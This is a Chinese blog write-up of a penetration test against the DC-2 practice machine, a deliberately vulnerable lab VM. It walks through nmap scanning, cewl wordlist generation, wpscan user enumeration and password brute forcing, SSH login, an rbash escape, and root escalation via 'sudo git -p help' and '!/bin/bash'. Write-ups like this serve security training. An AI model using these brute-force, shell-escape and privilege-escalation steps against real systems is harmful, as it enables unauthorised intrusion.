Write-Up - [渗透测试] DC-2靶机渗透测试

最新推荐文章于 2025-06-12 15:56:24 发布
原创 最新推荐文章于 2025-06-12 15:56:24 发布
· 168 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全

本文描述了一名渗透测试者对DC-2靶机进行的步骤,包括使用nmap探测端口,识别web和SSH服务,通过cewl字典爆破获取密码,利用wpscan和dirb扫描网站,最终通过rbash和git提权获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Author:一条’小龍龙

Team:Traceless 网络安全团队

Data:2023/10/7

Description:DC-2靶机渗透测试

step1 信息收集

ifconfig

在这里插入图片描述

nmap -T4 -sn 192.168.169.0/24 --min-rate 1000

在这里插入图片描述

靶机IP为192.168.169.132

扫描靶机端口信息

nmap -T4 -sV 192.168.169.132 -p 1-65535 --min-rate 1000

在这里插入图片描述

开放服务为webssh,端口分别为80,7744

设置host

echo 192.168.169.132 dc-2 >> /etc/hosts

在这里插入图片描述

访问web网站

在这里插入图片描述

在这里插入图片描述

flag页面给出了信息,猜测使用cewl生成字典爆破密码

cewl -w passwd.txt http://dc-2

在这里插入图片描述

在这里插入图片描述

扫描网站详细信息

wpscan --ignore-main-redirect --url 192.168.169.132 --enumerate u --force

在这里插入图片描述

在这里插入图片描述

将用户名写入文件中,后续会用到

扫描网站目录

dirb http://dc-2

在这里插入图片描述

访问http://dc-2/wp-admin/页面即可跳转至登陆页面

在这里插入图片描述

爆破密码

wpscan --url http://dc-2/ -U user.txt -P passwd.txt

在这里插入图片描述

将获得的密码写入pass.txt文件中

在这里插入图片描述

step2 渗透测试

登录

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

经测试,网站无法利用

尝试ssh登录

ssh jreey@192.168.169.132 -p 7744
ssh tom@192.168.169.132 -p 7744

在这里插入图片描述

jerry账户登陆失败,尝试登陆tom账户成功

在这里插入图片描述

提示没有这个命令,但我们发现了rbsah。 有兴趣的朋友,可以了解下什么是rbash

尝试rbash绕过

查看环境变量

export -p

在这里插入图片描述

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

单词中看到有su tom jerry,猜测切换jerry账户

su jerry

在这里插入图片描述

提示词中有 git

查看可以使用root权限的命令

sudo -l

在这里插入图片描述

尝试git提权

sudo git -p help

输入!/bin/bash回车

在这里插入图片描述

step3 拿到flag!请添加图片描述

在这里插入图片描述

请添加图片描述

DC-2靶机详解(1),网络安全基础入门教程
2301_82101171的博客
04-13 992
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
DC-5 靶机渗透测试全过程
2401_88083440的博客
02-12 1158
(1)本次学习到的比较新奇的点就是利用文件包含漏洞来getshell(2)然后对于问题解决的思路还是需要打开一些。
渗透测试-DC2
最新发布
qq_62534664的博客
06-12 664
名称:DC: 2发布日期:22 Mar 2019作者:DCAU系列: DC网络信息:网络配置:NAT模式靶机:192.168.44.141kali攻击机:192.168.44.140。
Write-Up - [渗透测试] 记一次暗月2020最新渗透测试项目七的内网渗透
weixin_54517170的博客
09-25 644
Write-Up - [渗透测试] 记一次暗月2020最新渗透测试项目七的内网渗透
HTB 靶机 EscapeTwo Write-up(Easy)
qq_45203884的博客
05-23 1511
本文记录了对目标主机10.10.11.51的渗透测试过程。通过初始凭证rose/KxEPkKe6R8su访问SMB共享,在accounts.xlsx中发现多组新凭证。使用密码喷洒验证oscar/86LxLBMgEWaKUnBG有效,并通过MSSQL的sa账户(MSSQLP@ssw0rd!)获取sql_svc权限。在配置文件中发现sql_svc密码WqSZAF6CysDQbGb3,成功横向移动到ryan用户,最终通过WinRM获得交互式shell。整个测试过程展示了从初始访问到权限提升的完整攻击链。
HTB 靶机 TombWatcher Write-up(Medium)
qq_45203884的博客
06-10 2359
本文详细描述了针对Active Directory域控制器10.10.11.72渗透测试过程。通过端口扫描发现关键域服务后,利用初始凭证henry:H3nry_987TGV!进行用户枚举和BloodHound分析,发现一条复杂攻击链:首先通过WriteSPN权限对alfred进行Kerberoasting获取密码,再利用AddSelf权限加入infrastructure组读取gMSA账户哈希,随后强制重置sam密码并获取john的控制权。最终通过恢复被删除的cert_admin用户,利用ADCS提权成功获
HTB 靶机 TheFrizz Write-up(Medium)
qq_45203884的博客
06-06 1183
本文记录了针对HTB靶机FrizzDC渗透测试过程。首先通过端口扫描识别出Web服务,利用Gibbon LMS的CVE-2023-45878漏洞获得初始shell。随后在数据库配置文件中发现凭证,通过哈希破解获取f.frizzle用户密码。虽然尝试了多种横向移动方法,但受到Kerberos认证限制。最终通过SSH成功登录f.frizzle账户,为后续权限提升奠定基础。整个渗透过程展现了从漏洞利用到凭证收集、哈希破解及横向移动的完整攻击链。
HTB 靶机 Certified Write-up(Medium)
qq_45203884的博客
05-21 1199
本文详细记录了针对Active Directory域控主机(10.10.11.41)的渗透测试过程。通过Nmap扫描识别关键服务端口后,利用初始凭据(judith.mader/judith09)开展LDAP用户枚举、SMB共享探查及Kerberos攻击(AS-REP Roasting和Kerberoasting),成功获取management_svc的TGS票据哈希但未破解。随后通过BloodHound分析发现judith.mader对Management组具有WriteOwner权限,利用该权限完成三步提
渗透测试-DC:1
qq_62534664的博客
06-11 651
名称:DC: 1发布日期:28 Feb 2019作者:DCAU系列: DC网络信息:网络配置:NAT模式靶机:192.168.44.139kali攻击机:192.168.44.140。
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 314
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
vulnhub靶机-DC8-Writeup
liuhanzhe的专栏
12-09 2077
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-8,367/ DESCRIPTION DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challe
vulnhub靶机-DC6-Writeup
liuhanzhe的专栏
12-08 407
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-6,315/ DESCRIPTION DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for be
Vulnhub-DC-1靶机渗透练习
weixin_52451257的博客
11-15 4296
DC-1 第一步:信息收集 nmap -sn 192.168.231.0/24 (进行存活主机发现) nmap -A -p- 192.168.231.142 (进行针对靶机的详细信息收集查看靶机开放了那些端口) dirb -http://192.168.231.142 nikto -h http://192.168.231.142 (敏感信息发现,cms是drupal7.0版本) 第二部:漏洞利用 msf 搜索关于drupal的相关漏洞. 我可能是歪打正着,上...
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 6177
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8723
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
守护数字世界:网络安全核心技术与实践策略
Thanks_ks 的嵌入式代码熔炉:炼出 STM32 到 RTOS 的极致效能!
06-10 795
本文剖析网络安全常见威胁如恶意软件、网络钓鱼等,详述加密、防火墙等核心技术,给出建立安全策略等实践策略,展望人工智能、物联网安全等未来趋势,助读者全面了解网络安全,提升防护能力与文件查找效率。
网络安全】SRC漏洞挖掘思路/手法分享
等风来
06-03 768
本文总结了多个实用的渗透测试技巧,涵盖接口安全、权限管理、数据泄露等多个方面。主要包括:主机URL复制差异、GET请求并发实现、密码明文获取方法、文件上传黑名单绕过、优惠券逻辑漏洞测试、用户信息越权访问、多重参数修改越权、复杂ID收集技巧、参数删除实现越权、权限管理参数空值测试、Cookie参数越权、Host头修改越权、并发测试场景、HTTP方法滥用、前端限制绕过、分隔符注入攻击、脏数据绕过频率限制、数组参数篡改以及邀请权限提升漏洞等
网络安全之内核初级对抗技术分析
anquan2233的博客
06-10 1098
Windows 内核提供了多个强大的回调接口,可以用于监控或控制系统行为,其中 ObRegisterCallbacks 和 CmRegisterCallback 是两种最常用于进程保护和注册表监控的机制。本文会通过多个完整的驱动示例,演示如何利用这两种回调进行内核级防护,并分析它们在初级对抗中的实际应用效果与局限性。测试环境:win10内核回调机制是内核安全防护的重要组成部分,但在面对有一定逆向能力和 Ring0 编写能力的攻击者时,其对抗能力仍存在上限。
网络安全与防护》知识点复习
wxy的博客
06-12 1292
网络安全与防护》知识点复习
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一条小龍龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值